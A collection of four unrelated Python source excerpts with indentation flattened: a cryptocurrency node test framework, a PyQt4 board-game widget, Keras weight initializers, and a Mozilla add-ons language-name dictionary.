sys.exit(self.TEST_EXIT_PASSED)
else:
self.log.error("Test failed. Test logging available at %s/test_framework.log", self.options.tmpdir)
logging.shutdown()
sys.exit(self.TEST_EXIT_FAILED)
def _start_logging(self):
# Add logger and logging handlers
self.log = logging.getLogger('TestFramework')
self.log.setLevel(logging.DEBUG)
# Create file handler to log all messages
fh = logging.FileHandler(self.options.tmpdir + '/test_framework.log')
fh.setLevel(logging.DEBUG)
# Create console handler to log messages to stderr. By default this logs only error messages, but can be configured with --loglevel.
ch = logging.StreamHandler(sys.stdout)
# User can provide log level as a number or string (eg DEBUG). loglevel was caught as a string, so try to convert it to an int
ll = int(self.options.loglevel) if self.options.loglevel.isdigit() else self.options.loglevel.upper()
ch.setLevel(ll)
# Format logs the same as oakcoind's debug.log with microprecision (so log files can be concatenated and sorted)
formatter = logging.Formatter(fmt = '%(asctime)s.%(msecs)03d000 %(name)s (%(levelname)s): %(message)s', datefmt='%Y-%m-%d %H:%M:%S')
formatter.converter = time.gmtime
fh.setFormatter(formatter)
ch.setFormatter(formatter)
# add the handlers to the logger
self.log.addHandler(fh)
self.log.addHandler(ch)
if self.options.trace_rpc:
rpc_logger = logging.getLogger("OakcoinRPC")
rpc_logger.setLevel(logging.DEBUG)
rpc_handler = logging.StreamHandler(sys.stdout)
rpc_handler.setLevel(logging.DEBUG)
rpc_logger.addHandler(rpc_handler)
# Test framework for doing p2p comparison testing, which sets up some oakcoind
# binaries:
# 1 binary: test binary
# 2 binaries: 1 test binary, 1 ref binary
# n>2 binaries: 1 test binary, n-1 ref binaries
class ComparisonTestFramework(OakcoinTestFramework):
def __init__(self):
super().__init__()
self.num_nodes = 2
self.setup_clean_chain = True
def add_options(self, parser):
parser.add_option("--testbinary", dest="testbinary",
default=os.getenv("BITCOIND", "oakcoind"),
help="oakcoind binary to test")
parser.add_option("--refbinary", dest="refbinary",
default=os.getenv("BITCOIND", "oakcoind"),
help="oakcoind binary to use for reference nodes (if any)")
def setup_network(self):
self.nodes = start_nodes(
self.num_nodes, self.options.tmpdir,
extra_args=[['-whitelist=127.0.0.1']] * self.num_nodes,
binary=[self.options.testbinary] +
[self.options.refbinary]*(self.num_nodes-1))
| |
#!/usr/bin/python
# -*- coding: utf-8 -*-
import logging
from PyQt4.QtGui import QWidget, QVBoxLayout, QHBoxLayout
from PyQt4.QtCore import QObject, SIGNAL
# Custom Widgets
from pyduel_gui.widgets.board_widget import BoardWidget
from pyduel_gui.widgets.dice_widget import DiceWidget
from pyduel_gui.widgets.action_widget import ActionWidget
from pyduel_gui.widgets.log_widget import LogWidget
from pyduel_gui.widgets.squad_tab_widget import SquadTabWidget
from pyduel_gui.widgets.hand_widget import HandWidget
# temporary settings from engine state
from pyduel_engine.content.engine_states import Action
MAX_HAND_SIZE = 10
class GameWidget(QWidget):
"""Instantiates game object, and all widgets, then calls game setup """
def __init__(self, parent=None):
super(GameWidget, self).__init__(parent)
self.game = self.parent().game
self.__build_controls()
self.__build_layout()
self._setupGame()
#########################################################################
# Game Phase Methods
#########################################################################
def _setupGame(self):
"""Setup game and update gui to match """
self._log('Initializing Game')
self.game.setup()
self._charsPlace()
self.startGame()
def startGame(self):
"""Starts the game. """
logging.info('Game Start')
self._squadsUpdate()
self._movePhaseStart()
def _movePhaseStart(self):
"""Toggles move phase in game, shows hand """
self._log("{0} Move phase start".format(self.game.print_status()))
# TODO: Probably doesn't belong here
self._handsUpdate()
self.game.move_phase_start()
self._movePhaseSet()
def _movePhaseEnd(self):
"""Called when the the active player has no more moves left
Lock down the active squad, toggle move phase to false and lock the
skip move button then calls the start of the action phase """
self._log("{0} Move phase end".format(self.game.print_status()))
# update game
self.game.move_phase_end()
self._resetTempComponents()
self._actionPhaseStart()
def _actionPhaseStart(self):
"""starts the action phase """
self._log("{0} Action phase start".format(self.game.print_status()))
# update game
self.game.action_phase_start()
if self.game.active_squad().has_action():
if self.game.active_squad().has_hand():
self._actionPhaseSet()
else:
self._actionPhaseEnd()
def _actionPhaseEnd(self):
"""Ends the action phase """
self._log("{0} Action Phase end".format(self.game.print_status()))
# update game
self.game.action_phase_end()
self._lockActiveSquad()
self._turnEnd()
def _turnEnd(self):
"""Ends the turn incrementing what turn it is unless its the last turn
in which we reset back to the first player and call for the new round
"""
self._log("{0} Turn End".format(self.game.print_status()))
if self.game.turn == self.game.num_squads() - 1:
self._roundEnd()
else:
self.game.increment_turn()
self.squads.setCurrentIndex(self.game.turn)
self._movePhaseStart()
def _roundEnd(self):
"""End of round """
self._log("{0} Round End".format(self.game.print_status()))
self.game.increment_round()
self._movePhaseStart()
###########################################################################
# Game and Gui modifiers
###########################################################################
def _movePhaseSquareSelection(self, pos):
"""Move Phase Square selection.
- if active char is not set. Set new active character at pos or,
if active char pos is the input pos, move the character.
- clean up the board if deselecting or moving """
# TODO: Either lock down active squad or make condition for
# switching active characters
# select active character and targets
if self.game.active_char is None:
self._activeCharSelect(pos)
else:
# gui cleanup
self._possibleTargetsDeactivate()
self._squareDeselect(pos)
# move
if self.game.active_char.pos != pos:
self._charMove(self.game.active_char, pos)
# deselect active char
self._resetTempComponents()
def _actionPhaseSquareSelection(self, pos):
"""Action Phase Square selection. difference from the move phase is
after the second square is selected, the function ends """
# select active character and targets
if self.game.active_char is None:
self._activeCharSelect(pos)
elif self.game.active_char.pos == pos:
# gui cleanup
if self.game.active_target is not None:
self._squareDeselect(self.game.active_target.pos)
self.game.active_target = None
self._activeCharDeselect()
else:
self._actionPhaseTargetSelection(pos)
def _actionPhaseTargetSelection(self, pos):
"""continuation method of action phase square select. Select or
deselect target """
if self.game.active_target is None:
self._activeTargetSelect(pos)
# Deselect active target
elif self.game.active_target.pos == pos:
self._activeTargetDeselect()
def _activeCardSelect(self, card_index):
"""Select or deselect card and update the gui """
self.game.active_card_select(card_index)
self.hand.activateCard(card_index)
self.hand.activateCard(
self.game.active_squad().active_card(card_index))
# TODO: Make call to the hand to lock the rest of the hand
def _activeCardDeselect(self):
"""Cleanup the selected cards """
self.game.active_card_deselect()
self.hand.deactivateCard(self.game.active_squad().active_card(None))
def _actionDraw(self):
"""Clean up board if necessary, draw card, update the gui to reflect
changes """
self._log("{0} Card Draw".format(self.game.print_status()))
self.game.action_draw()
def _resetTempComponents(self):
"""Clear selected and active components """
if self.game.active_char is not None:
self._squareDeselect(self.game.active_char.pos)
self.game.active_char = None
if self.game.possible_targets is not None:
self._possibleTargetsDeactivate()
self.game.possible_targets = None
if self.game.active_target is not None:
self._squareDeselect(self.game.active_target.pos)
self.game.active_target = None
def _charMove(self, char, pos):
"""moves character to new position in game and gui. Gui needs to change
before the game, since the char.pos will be overwritten if the game
changes first """
self._log("{0} moved to {1} -> {2}".format(char.name, char.pos, pos))
self.board.moveChar(char.pos, pos, char.side, char.name.split()[-1])
self.game.move_char(char, pos)
self._squadUpdate()
if self.game.num_moves < 1:
self._movePhaseEnd()
def _activeCharSelect(self, pos):
"""Select active character in game and gui and activate possible
targets Called in the move phase and action phase for active char
select """
self.game.active_char_select(pos)
self._squareSelect(pos)
self._possibleTargetsActivate()
def _activeCharDeselect(self):
"""Deselect active char and deactivate possible targets """
self._possibleTargetsDeactivate()
self._squareDeselect(self.game.active_char.pos)
self._resetTempComponents()
def _activeTargetSelect(self, pos):
"""deactivate possible targets, select target in game and gui. Called
by the _actionPhaseTargetSelection() """
self._possibleTargetsDeactivate()
self.game.set_active_target(pos)
self._squareSelect(pos)
def _activeTargetDeselect(self):
"""Deselect active target and activate possible targets """
self._squareDeselect(self.game.active_target.pos)
self._possibleTargetsActivate()
self.game.active_target = None
def _movePhaseSet(self):
"""Resets the hand, disables action buttons, unlocks active squad and
skip move button """
# self._resetHand()
# update dice values
self._diceUpdate()
# lock actions down
self.actions.disableActions()
# unlock skip button
self.actions.skip.setDisabled(False)
# unlock characters so they can move
self._unlockActiveSquad()
##########################################################################
# Widget/View Modifiers
##########################################################################
def _actionPhaseSet(self):
"""Update action phase widgets """
self._actionButtonsUnlock()
self.actions.skip.setDisabled(True)
self._unlockActiveSquad()
# Action Widget
def _actionButtonsUnlock(self):
"""Locks and unlocks buttons based on actions available """
# lock or unlock action buttons if able
if self.game.active_squad().can_draw_card():
# unlocks draw ability
self.actions.draw.setDisabled(False)
# TODO: might be unnecessary since the hand is already visible
if self.game.active_squad().has_hand():
# unlock play button
self.actions.play.setDisabled(False)
if self.game.active_squad().can_heal_main() or \
self.game.active_squad().can_heal_minor():
# unlock heal button
self.actions.heal.setDisabled(False)
# Squad Widget
def _squadUpdate(self, squad_index=None):
"""Refresh squad information after all actions """
if squad_index is None:
self.squads.updateTab(self.game.active_squad().to_json())
else:
self.squads.updateTab(self.game.squads()[squad_index].to_json())
def _squadsUpdate(self):
for index, squad in enumerate(self.game.squads()):
self._squadUpdate(index)
# Dice Widget
def _diceUpdate(self):
"""Sets the dice widget updates and deactivates """
self.dice.set_result(self.game.dice().num(), self.game.dice().is_all())
self._log("Roll {0}".format(self.game.dice().print_result()))
# Hand Widget
def _handUpdate(self, squad_index=None):
"""get list of all locked and unlocked cards """
if squad_index is None:
hand_json = [card.to_json()
for card in self.game.active_squad().hand]
else:
hand_json = [card.to_json()
for card in self.game.squads()[squad_index].hand]
# print(hand_json)
self.hand.setCards(hand_json)
def _handsUpdate(self):
for index, squad in enumerate(self.game.squads()):
self._handUpdate(index)
# Board Widget
def _lockActiveSquad(self):
"""locks the active squad characters on the board """
self.board.lockSquares(self.game.get_active_chars())
def _unlockActiveSquad(self):
"""unlocks the active squad characters on the board """
self.board.unlockSquares(self.game.get_active_chars())
def _squareSelect(self, pos):
"""Select the active character in game and gui """
self.board.squareSelect(pos)
def _squareDeselect(self, pos):
"""Deselect the active character in game and gui """
self.board.squareDeselect(pos)
def _possibleTargetsDeactivate(self):
"""Deactivate possible targets """
self.board.deactivateSquares(self.game.possible_targets)
def _possibleTargetsActivate(self):
"""Activate possible targets """
self.board.activateSquares(self.game.possible_targets)
# Log Widget
def _log(self, info):
"""Appends state changes and events to the log """
self.log.append(info)
# multiple widgets
def _squadGuiUpdate(self):
"""Update hand, squad gui """
self._squadUpdate()
self._handUpdate()
###########################################################################
# Game Setup methods
###########################################################################
def _charsPlace(self):
"""Place all characters on the board gui """
for squad in self.game.squads():
self._charPlace(squad.chars[0], squad.chars[0].pos)
list_pos = self.game.get_adj_empty_pos(squad.chars[0].pos)
self._charPlace(squad.chars[1], list_pos[0])
self._charPlace(squad.chars[2], list_pos[1])
def _charPlace(self, char, pos):
"""places character in new position in game and gui """
self._log("{0} placed at {1}".format(char.name, pos))
self.game.char_place(char, pos)
self.board.placeChar(pos, char.side, char.name.split()[-1])
#########################################################################
# Event/Selection Methods
#########################################################################
def _actionClicked(self, action_type):
"""Action button click responses """
# TODO: move the skip button out of actions
if action_type == Action.skip:
self._movePhaseEnd()
else:
if action_type == Action.draw:
if len(self.game.active_squad().hand) == MAX_HAND_SIZE:
# TODO: discard card to draw
self._discardCard()
self._actionDraw()
elif action_type == Action.heal:
self._discardToHeal()
else:
if self.game.can_play_card():
self.game.action_play_card()
# update temp
self._resetTempComponents()
# update gui after changes
self._squadUpdate()
self._handUpdate()
if not self.game.active_squad().has_action():
self._actionPhaseEnd()
def _squareClicked(self, pos):
"""Select active square or target square """
if self.game.is_move_phase():
self._movePhaseSquareSelection(pos)
else:
self._actionPhaseSquareSelection(pos)
def _cardClicked(self, card_index):
if self.game.active_card() is None:
self.game.set_active_card(card_index)
self.hand.cardSelect(card_index)
else:
self.hand.cardDeselect(self.game.active_card())
self.game.set_active_card(None)
###########################################################################
# Game Widget methods
###########################################################################
def __build_controls(self):
"""Builds the widgets and the connections to the widgets """
self.board = BoardWidget(self.game.board())
QObject.connect(self.board, SIGNAL("select"), self._squareClicked)
self.hand = HandWidget()
QObject.connect(self.hand, SIGNAL("cardClick"), self._cardClicked)
self.squads = SquadTabWidget(self.game.squads_json())
# QObject.connect(self.squad, SIGNAL("squadSignal"), self._squadSignal)
self.actions = ActionWidget(self)
QObject.connect(self.actions, SIGNAL("actionClicked"),
self._actionClicked)
self.dice = DiceWidget()
self.log = LogWidget()
def __build_layout(self):
"""builds the layouts of the widgets """
self.verticalLayout = QVBoxLayout()
self.vertical2Layout = QVBoxLayout()
self.horizontalLayout = QHBoxLayout()
self.horizontal2Layout = QHBoxLayout()
self.actionDiceHLayout = QHBoxLayout()
self.actionDiceHLayout.setSpacing(0)
self.actionDiceHLayout.addWidget(self.actions)
self.actionDiceHLayout.addWidget(self.dice)
self.boardCardVLayout = QVBoxLayout()
self.boardCardVLayout.setSpacing(0)
self.boardCardVLayout.addWidget(self.board)
self.boardCardVLayout.addWidget(self.hand)
self.horizontalLayout.addLayout(self.boardCardVLayout)
self.vertical2Layout.addWidget(self.log)
self.vertical2Layout.addWidget(self.squads)
self.vertical2Layout.addLayout(self.actionDiceHLayout)
self.verticalLayout.addLayout(self.horizontalLayout)
self.horizontalLayout.addLayout(self.vertical2Layout)
self.verticalLayout.addLayout(self.horizontal2Layout)
self.setLayout(self.verticalLayout)
if __name__ == '__main__':
import sys
from PyQt4.QtGui import QApplication
app = QApplication(sys.argv)
from pyduel_engine.content.engine_states import BoardType
from pyduel_engine.utilities import squad_utilities as s_utils
from pyduel_engine.content.engine_states import SqState as SqState
from pyduel_engine.model.engine import Engine
from pyduel_engine.epic_plugin.epic_states import Main
squads = [s_utils.setup_squad(1, Main.dooku, SqState.dark),
s_utils.setup_squad(2, Main.mace, SqState.light)]
board_type = BoardType.ruins
test_engine = Engine({'squads': squads, 'board_type': board_type})
test_engine.num_players = 2
win = GameWidget(test_engine)
win.show()
sys.exit(app.exec_())
| |
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Keras initializer classes (soon to be replaced with core TF initializers).
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import six
from tensorflow.contrib.keras.python.keras.utils.generic_utils import deserialize_keras_object
from tensorflow.contrib.keras.python.keras.utils.generic_utils import serialize_keras_object
from tensorflow.python.ops.init_ops import Constant
from tensorflow.python.ops.init_ops import Initializer
from tensorflow.python.ops.init_ops import Ones
from tensorflow.python.ops.init_ops import Orthogonal
from tensorflow.python.ops.init_ops import RandomNormal
from tensorflow.python.ops.init_ops import RandomUniform
from tensorflow.python.ops.init_ops import TruncatedNormal
from tensorflow.python.ops.init_ops import VarianceScaling
from tensorflow.python.ops.init_ops import Zeros
class Identity(Initializer):
"""Initializer that generates the identity matrix.
Only use for square 2D matrices.
Arguments:
gain: Multiplicative factor to apply to the identity matrix.
"""
def __init__(self, gain=1.):
self.gain = gain
def __call__(self, shape, dtype=None):
if len(shape) != 2 or shape[0] != shape[1]:
raise ValueError('Identity matrix initializer can only be used '
'for 2D square matrices.')
else:
return self.gain * np.identity(shape[0])
def get_config(self):
return {'gain': self.gain}
def lecun_normal(seed=None):
"""LeCun normal initializer.
It draws samples from a truncated normal distribution centered on 0
with `stddev = sqrt(1 / fan_in)`
where `fan_in` is the number of input units in the weight tensor.
Arguments:
seed: A Python integer. Used to seed the random generator.
Returns:
An initializer.
References:
- [Self-Normalizing Neural Networks](https://arxiv.org/abs/1706.02515)
- [Efficient
Backprop](http://yann.lecun.com/exdb/publis/pdf/lecun-98b.pdf)
"""
return VarianceScaling(
scale=1., mode='fan_in', distribution='normal', seed=seed)
def lecun_uniform(seed=None):
"""LeCun uniform initializer.
It draws samples from a uniform distribution within [-limit, limit]
where `limit` is `sqrt(3 / fan_in)`
where `fan_in` is the number of input units in the weight tensor.
Arguments:
seed: A Python integer. Used to seed the random generator.
Returns:
An initializer.
References:
LeCun 98, Efficient Backprop,
http://yann.lecun.com/exdb/publis/pdf/lecun-98b.pdf
"""
return VarianceScaling(
scale=1., mode='fan_in', distribution='uniform', seed=seed)
def glorot_normal(seed=None):
"""Glorot normal initializer, also called Xavier normal initializer.
It draws samples from a truncated normal distribution centered on 0
with `stddev = sqrt(2 / (fan_in + fan_out))`
where `fan_in` is the number of input units in the weight tensor
and `fan_out` is the number of output units in the weight tensor.
Arguments:
seed: A Python integer. Used to seed the random generator.
Returns:
An initializer.
References:
Glorot & Bengio, AISTATS 2010
http://jmlr.org/proceedings/papers/v9/glorot10a/glorot10a.pdf
"""
return VarianceScaling(
scale=1., mode='fan_avg', distribution='normal', seed=seed)
def glorot_uniform(seed=None):
"""Glorot uniform initializer, also called Xavier uniform initializer.
It draws samples from a uniform distribution within [-limit, limit]
where `limit` is `sqrt(6 / (fan_in + fan_out))`
where `fan_in` is the number of input units in the weight tensor
and `fan_out` is the number of output units in the weight tensor.
Arguments:
seed: A Python integer. Used to seed the random generator.
Returns:
An initializer.
References:
Glorot & Bengio, AISTATS 2010
http://jmlr.org/proceedings/papers/v9/glorot10a/glorot10a.pdf
"""
return VarianceScaling(
scale=1., mode='fan_avg', distribution='uniform', seed=seed)
def he_normal(seed=None):
"""He normal initializer.
It draws samples from a truncated normal distribution centered on 0
with `stddev = sqrt(2 / fan_in)`
where `fan_in` is the number of input units in the weight tensor.
Arguments:
seed: A Python integer. Used to seed the random generator.
Returns:
An initializer.
References:
He et al., http://arxiv.org/abs/1502.01852
"""
return VarianceScaling(
scale=2., mode='fan_in', distribution='normal', seed=seed)
def he_uniform(seed=None):
"""He uniform variance scaling initializer.
It draws samples from a uniform distribution within [-limit, limit]
where `limit` is `sqrt(6 / fan_in)`
where `fan_in` is the number of input units in the weight tensor.
Arguments:
seed: A Python integer. Used to seed the random generator.
Returns:
An initializer.
References:
He et al., http://arxiv.org/abs/1502.01852
"""
return VarianceScaling(
scale=2., mode='fan_in', distribution='uniform', seed=seed)
# Compatibility aliases
# pylint: disable=invalid-name
zero = zeros = Zeros
one = ones = Ones
constant = Constant
uniform = random_uniform = RandomUniform
normal = random_normal = RandomNormal
truncated_normal = TruncatedNormal
identity = Identity
orthogonal = Orthogonal
# pylint: enable=invalid-name
# Utility functions
def serialize(initializer):
return serialize_keras_object(initializer)
def deserialize(config, custom_objects=None):
return deserialize_keras_object(
config,
module_objects=globals(),
custom_objects=custom_objects,
printable_module_name='initializer')
def get(identifier):
if isinstance(identifier, dict):
return deserialize(identifier)
elif isinstance(identifier, six.string_types):
config = {'class_name': str(identifier), 'config': {}}
return deserialize(config)
elif callable(identifier):
return identifier
else:
raise ValueError('Could not interpret initializer identifier:', identifier)
| |
# Languages that we support on AMO, e.g we have translations for them
# and they're tested.
AMO_LANGUAGES = {
'af': {'english': 'Afrikaans', 'native': 'Afrikaans'},
'ar': {'english': 'Arabic', 'native': '\u0639\u0631\u0628\u064a'},
'ast': {'english': 'Asturian', 'native': 'Asturianu'},
'az': {'english': 'Azerbaijani', 'native': 'Az\u0259rbaycanca'},
'bg': {
'english': 'Bulgarian',
'native': '\u0411\u044a\u043b\u0433\u0430\u0440\u0441\u043a\u0438',
},
'bn': {'english': 'Bengali', 'native': '\u09ac\u09be\u0982\u09b2\u09be'},
'bs': {'english': 'Bosnian', 'native': 'Bosanski'},
'ca': {'english': 'Catalan', 'native': 'Catal\xe0'},
'cak': {'english': 'Kaqchikel', 'native': 'Maya Kaqchikel'},
'cs': {'english': 'Czech', 'native': '\u010ce\u0161tina'},
'da': {'english': 'Danish', 'native': 'Dansk'},
'de': {'english': 'German', 'native': 'Deutsch'},
'dsb': {'english': 'Lower Sorbian', 'native': 'Dolnoserb\u0161\u0107ina'},
'el': {
'english': 'Greek',
'native': '\u0395\u03bb\u03bb\u03b7\u03bd\u03b9\u03ba\u03ac',
},
'en-CA': {'english': 'English (Canadian)', 'native': 'English (Canadian)'},
'en-GB': {'english': 'English (British)', 'native': 'English (British)'},
'en-US': {'english': 'English (US)', 'native': 'English (US)'},
'es': {'english': 'Spanish', 'native': 'Espa\xf1ol'},
'et': {'english': 'Estonian', 'native': 'Eesti keel'},
'eu': {'english': 'Basque', 'native': 'Euskara'},
'fa': {'english': 'Persian', 'native': '\u0641\u0627\u0631\u0633\u06cc'},
'fi': {'english': 'Finnish', 'native': 'suomi'},
'fr': {'english': 'French', 'native': 'Fran\xe7ais'},
'fy-NL': {'english': 'Frisian', 'native': 'Frysk'},
'ga-IE': {'english': 'Irish', 'native': 'Gaeilge'},
'gu': {
'english': 'Gujarati',
'native': '\u0a97\u0ac1\u0a9c\u0ab0\u0abe\u0aa4\u0ac0',
},
'he': {'english': 'Hebrew', 'native': '\u05e2\u05d1\u05e8\u05d9\u05ea'},
'hr': {'english': 'Croatian', 'native': 'Hrvatski'},
'hsb': {'english': 'Upper Sorbian', 'native': 'Hornjoserbsce'},
'hu': {'english': 'Hungarian', 'native': 'magyar'},
'id': {'english': 'Indonesian', 'native': 'Bahasa Indonesia'},
'it': {'english': 'Italian', 'native': 'Italiano'},
'ja': {'english': 'Japanese', 'native': '\u65e5\u672c\u8a9e'},
'ka': {
'english': 'Georgian',
'native': '\u10e5\u10d0\u10e0\u10d7\u10e3\u10da\u10d8',
},
'kab': {'english': 'Kabyle', 'native': 'Taqbaylit'},
'ko': {'english': 'Korean', 'native': '\ud55c\uad6d\uc5b4'},
'lt': {'english': 'Lithuanian', 'native': 'Lietuvi\u0173'},
'lv': {'english': 'Latvian', 'native': 'Latvie\u0161u'},
'mk': {
'english': 'Macedonian',
'native': '\u041c\u0430\u043a\u0435\u0434\u043e\u043d\u0441\u043a\u0438', # noqa
},
'mn': {'english': 'Mongolian', 'native': '\u041c\u043e\u043d\u0433\u043e\u043b'},
'ms': {'english': 'Malay', 'native': 'Melayu'},
'mt': {
'english': 'Maltese',
'native': 'Malti',
},
'nb-NO': {'english': 'Norwegian (Bokm\xe5l)', 'native': 'Norsk bokm\xe5l'},
'nl': {'english': 'Dutch', 'native': 'Nederlands'},
'nn-NO': {'english': 'Norwegian (Nynorsk)', 'native': 'Norsk nynorsk'},
'pa-IN': {
'english': 'Punjabi (India)',
'native': '\u0a2a\u0a70\u0a1c\u0a3e\u0a2c\u0a40 (\u0a2d\u0a3e\u0a30\u0a24)', # noqa
},
'pl': {'english': 'Polish', 'native': 'Polski'},
'pt-BR': {
'english': 'Portuguese (Brazilian)',
'native': 'Portugu\xeas (do\xa0Brasil)',
},
'pt-PT': {'english': 'Portuguese (Portugal)', 'native': 'Portugu\xeas (Europeu)'},
'ro': {'english': 'Romanian', 'native': 'Rom\xe2n\u0103'},
'ru': {
'english': 'Russian',
'native': '\u0420\u0443\u0441\u0441\u043a\u0438\u0439',
},
'sk': {'english': 'Slovak', 'native': 'sloven\u010dina'},
'sl': {'english': 'Slovenian', 'native': 'Sloven\u0161\u010dina'},
'sq': {'english': 'Albanian', 'native': 'Shqip'},
'sv-SE': {'english': 'Swedish', 'native': 'Svenska'},
'te': {'english': 'Telugu', 'native': '\u0c24\u0c46\u0c32\u0c41\u0c17\u0c41'},
'th': {'english': 'Thai', 'native': '\u0e44\u0e17\u0e22'},
'tr': {'english': 'Turkish', 'native': 'T\xfcrk\xe7e'},
'uk': {
'english': 'Ukrainian',
'native': '\u0423\u043a\u0440\u0430\u0457\u043d\u0441\u044c\u043a\u0430', # noqa
},
'ur': {'english': 'Urdu', 'native': '\u0627\u064f\u0631\u062f\u0648'},
'vi': {'english': 'Vietnamese', 'native': 'Ti\u1ebfng Vi\u1ec7t'},
'zh-CN': {
'english': 'Chinese (Simplified)',
'native': '\u4e2d\u6587 (\u7b80\u4f53)',
},
'zh-TW': {
'english': 'Chinese (Traditional)',
'native': '\u6b63\u9ad4\u4e2d\u6587 (\u7e41\u9ad4)',
},
}
# Languages supported by product-details that we don't have translations for
# and haven't been tested. It's fine to move languages up to `AMO_LANGUAGES`
# but make sure they're tested.
# Languages in here are used for example in statistics views.
ADDITIONAL_PRODUCT_LANGUAGES = {
'ach': {'english': 'Acholi', 'native': 'Acholi'},
'ak': {'english': 'Akan', 'native': 'Akan'},
'am-et': {'english': 'Amharic', 'native': '\u12a0\u121b\u122d\u129b'},
'an': {'english': 'Aragonese', 'native': 'aragon\xe9s'},
'as': {
'english': 'Assamese',
'native': '\u0985\u09b8\u09ae\u09c0\u09af\u09bc\u09be',
},
'azz': {
'english': 'Highland Puebla Nahuatl',
'native': 'nahuatl sierra norte Puebla',
},
'be': {
'english': 'Belarusian',
'native': '\u0411\u0435\u043b\u0430\u0440\u0443\u0441\u043a\u0430\u044f', # noqa
},
'bm': {'english': 'Bambara', 'native': 'Bamanankan'},
'br': {'english': 'Breton', 'native': 'Brezhoneg'},
'brx': {'english': 'Bodo', 'native': u"\u092c\u0930'"},
'ca-valencia': {
'english': 'Catalan (Valencian)',
'native': 'catal\xe0 (valenci\xe0)',
},
'csb': {'english': 'Kashubian', 'native': 'Kasz\xebbsczi'},
'cy': {'english': 'Welsh', 'native': 'Cymraeg'},
'de-AT': {'english': 'German (Austria)', 'native': 'Deutsch (\xd6sterreich)'},
'de-CH': {'english': 'German (Switzerland)', 'native': 'Deutsch (Schweiz)'},
'de-DE': {'english': 'German (Germany)', 'native': 'Deutsch (Deutschland)'},
'ee': {'english': 'Ewe', 'native': 'E\u028be'},
'en-AU': {'english': 'English (Australian)', 'native': 'English (Australian)'},
'en-NZ': {'english': 'English (New Zealand)', 'native': 'English (New Zealand)'},
'en-ZA': {
'english': 'English (South African)',
'native': 'English (South African)',
},
'eo': {'english': 'Esperanto', 'native': 'Esperanto'},
'es-AR': {'english': 'Spanish (Argentina)', 'native': 'Espa\xf1ol (de Argentina)'},
'es-CL': {'english': 'Spanish (Chile)', 'native': 'Espa\xf1ol (de Chile)'},
'es-ES': {'english': 'Spanish (Spain)', 'native': 'Espa\xf1ol (de Espa\xf1a)'},
'es-MX': {'english': 'Spanish (Mexico)', 'native': 'Espa\xf1ol (de M\xe9xico)'},
'ff': {'english': 'Fulah', 'native': 'Pulaar-Fulfulde'},
'fj-FJ': {'english': 'Fijian', 'native': 'Vosa vaka-Viti'},
'fur-IT': {'english': 'Friulian', 'native': 'Furlan'},
'ga': {'english': 'Irish', 'native': 'Gaeilge'},
'gd': {'english': 'Gaelic (Scotland)', 'native': 'G\xe0idhlig'},
'gl': {'english': 'Galician', 'native': 'Galego'},
'gn': {'english': 'Guarani', 'native': u"Ava\xf1e'\u1ebd"},
'gu-IN': {
'english': 'Gujarati (India)',
'native': '\u0a97\u0ac1\u0a9c\u0ab0\u0abe\u0aa4\u0ac0 (\u0aad\u0abe\u0ab0\u0aa4)', # noqa
},
'ha': {'english': 'Hausa', 'native': 'Hausa'},
'hi': {'english': 'Hindi', 'native': '\u0939\u093f\u0928\u094d\u0926\u0940'},
'hi-IN': {
'english': 'Hindi (India)',
'native': '\u0939\u093f\u0928\u094d\u0926\u0940 (\u092d\u093e\u0930\u0924)', # noqa
},
'hy-AM': {
'english': 'Armenian',
'native': '\u0540\u0561\u0575\u0565\u0580\u0565\u0576',
},
'ig': {'english': 'Igbo', 'native': 'Igbo'},
'is': {'english': 'Icelandic', 'native': '\xedslenska'},
'ja-JP-mac': {'english': 'Japanese', 'native': '\u65e5\u672c\u8a9e'},
'kk': {'english': 'Kazakh', 'native': '\u049a\u0430\u0437\u0430\u049b'},
'km': {'english': 'Khmer', 'native': '\u1781\u17d2\u1798\u17c2\u179a'},
'kn': {'english': 'Kannada', 'native': '\u0c95\u0ca8\u0ccd\u0ca8\u0ca1'},
'kok': {'english': 'Konkani', 'native': '\u0915\u094b\u0902\u0915\u0928\u0940'},
'ks': {'english': 'Kashmiri', 'native': '\u0643\u0634\u0645\u06cc\u0631\u06cc'},
'ku': {'english': 'Kurdish', 'native': 'Kurd\xee'},
'la': {'english': 'Latin', 'native': 'Latina'},
'lg': {'english': 'Luganda', 'native': 'Luganda'},
'lij': {'english': 'Ligurian', 'native': 'Ligure'},
'ln': {'english': 'Lingala', 'native': 'Ling\xe1la'},
'lo': {'english': 'Lao', 'native': '\u0e9e\u0eb2\u0eaa\u0eb2\u0ea5\u0eb2\u0ea7'},
'ltg': {'english': 'Latgalian', 'native': 'Latgalie\u0161u valoda'},
'mai': {
'english': 'Maithili',
'native': '\u092e\u0948\u0925\u093f\u0932\u0940 \u09ae\u09c8\u09a5\u09bf\u09b2\u09c0', # noqa
},
'mg': {'english': 'Malagasy', 'native': 'Malagasy'},
'mi': {'english': 'Maori (Aotearoa)', 'native': 'M\u0101ori (Aotearoa)'},
'ml': {'english': 'Malayalam', 'native': '\u0d2e\u0d32\u0d2f\u0d3e\u0d33\u0d02'},
'mr': {'english': 'Marathi', 'native': '\u092e\u0930\u093e\u0920\u0940'},
'my': {
'english': 'Burmese',
'native': '\u1019\u103c\u1014\u103a\u1019\u102c\u1018\u102c\u101e\u102c', # noqa
},
'ne-NP': {'english': 'Nepali', 'native': '\u0928\u0947\u092a\u093e\u0932\u0940'},
'nr': {'english': 'Ndebele, South', 'native': 'isiNdebele'},
'nso': {'english': 'Northern Sotho', 'native': 'Sepedi'},
'oc': {'english': 'Occitan (Lengadocian)', 'native': 'occitan (lengadocian)'},
'or': {'english': 'Odia', 'native': '\u0b13\u0b21\u0b3c\u0b3f\u0b06'},
'pa': {'english': 'Punjabi', 'native': '\u0a2a\u0a70\u0a1c\u0a3e\u0a2c\u0a40'},
'rm': {'english': 'Romansh', 'native': 'rumantsch'},
'rw': {'english': 'Kinyarwanda', 'native': 'Ikinyarwanda'},
'sa': {
'english': 'Sanskrit',
'native': '\u0938\u0902\u0938\u094d\u0915\u0943\u0924',
},
